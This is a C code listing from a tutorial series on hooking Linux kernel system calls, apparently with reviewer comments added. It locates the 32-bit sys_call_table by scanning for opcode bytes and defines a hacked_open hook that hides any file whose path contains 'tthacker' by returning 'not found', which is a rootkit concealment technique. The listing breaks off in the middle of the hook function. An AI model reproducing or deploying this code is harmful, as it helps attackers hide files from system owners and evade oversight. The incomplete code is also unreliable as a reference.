Linux内核Hook系统调用(4)

/*
 * File-scope state for the system-call hooking example.
 * Addresses are held in int / unsigned int, so the listing only makes sense
 * on a 32-bit build.
 */

/* Not referenced anywhere in the visible part of the listing. */
static unsigned int SYS_CALL_TABLE_ADDR;
/* Pointer to the kernel's system-call table; not assigned in the visible part. */
void **sys_call_table;
/*
 * Start address of the code window scanned by get_sys_call_table().
 * It is set outside the visible lines - presumably to the system-call entry
 * routine; confirm against the earlier parts of this series.
 */
int base_system_call;
/*
 * Function pointer with the same signature as hacked_open(); presumably holds
 * the original open handler so it can be called or restored - it is not used
 * in the visible lines.
 */
int (*orig_open)(const char *pathname,int flag,mode_t mode);
/*
 * Three-byte x86 pattern FF 14 85: the opcode, ModRM and SIB bytes of the
 * 32-bit indirect call `call *disp32(,%eax,4)`. The four bytes that follow
 * the pattern in the instruction stream are the disp32 operand.
 */
unsigned char opcode_call[3]={0xff,0x14,0x85};

/*
 * match - compare the three bytes at source with opcode_call.
 * @source: start of the candidate byte sequence; three bytes must be
 *          readable there, which this function does not check.
 *
 * Bytes are compared in order and the comparison stops at the first
 * difference.
 *
 * Returns 1 when all three bytes are equal, 0 otherwise.
 */
int match(unsigned char *source)
{
        return source[0] == opcode_call[0] &&
               source[1] == opcode_call[1] &&
               source[2] == opcode_call[2];
}
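/*
 * get_sys_call_table - recover the system-call table address by pattern scan.
 *
 * Scans the first 100 byte offsets starting at base_system_call for the byte
 * sequence in opcode_call. On the first hit it returns the 32-bit value
 * stored right after those three bytes (the call's disp32 operand).
 *
 * Returns the value found, or -1 when the pattern is not in the window.
 *
 * Review notes:
 *  - 32-bit only: the scan base and the result travel in int / unsigned int.
 *  - The result is returned as int, so a value above INT_MAX typically comes
 *    back negative. Callers have to compare against exactly -1 rather than
 *    test for "< 0".
 *  - A hit at the last offset reads up to ins[105]; nothing here checks that
 *    those bytes are mapped.
 *  - Detection: both outcomes are logged at KERN_ALERT, so the scan is
 *    visible in the kernel log. Kernels configured to require signed modules
 *    will not load an unsigned module carrying this code.
 */
int get_sys_call_table(void)
{
        int i;
        unsigned char *ins=(unsigned char *)base_system_call;
        unsigned int sct;

        for(i=0;i<100;i++){
                /* Cheap first-byte test before the full three-byte compare. */
                if(ins[i]==opcode_call[0]){
                        if(match(ins+i)){
                                /* The disp32 operand follows the three pattern bytes. */
                                sct=*((unsigned int *)(ins+3+i));
                                printk(KERN_ALERT "sys_call_tabl's address is 0x%X\n",sct);
                                return sct;
                        }
                }
        }

        printk(KERN_ALERT "can't find the address of sys_call_table\n");
        return -1;
}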
int hacked_open(const char *pathname,int flag,mode_t mode)
{
// char *kernel_pathname;

char *hide="tthacker";
// kernel_pathname=(char *)kmalloc(1000,GFP_KERNEL);

// memcpy_fromfs(kernel_pathname,pathname,999);

if(strstr(pathname,hide)!=NULL){
  printk(KERN_ALERT "find name.\n");
  return -ENOENT;
 }
 else{
// kfree(kernel_pathname);
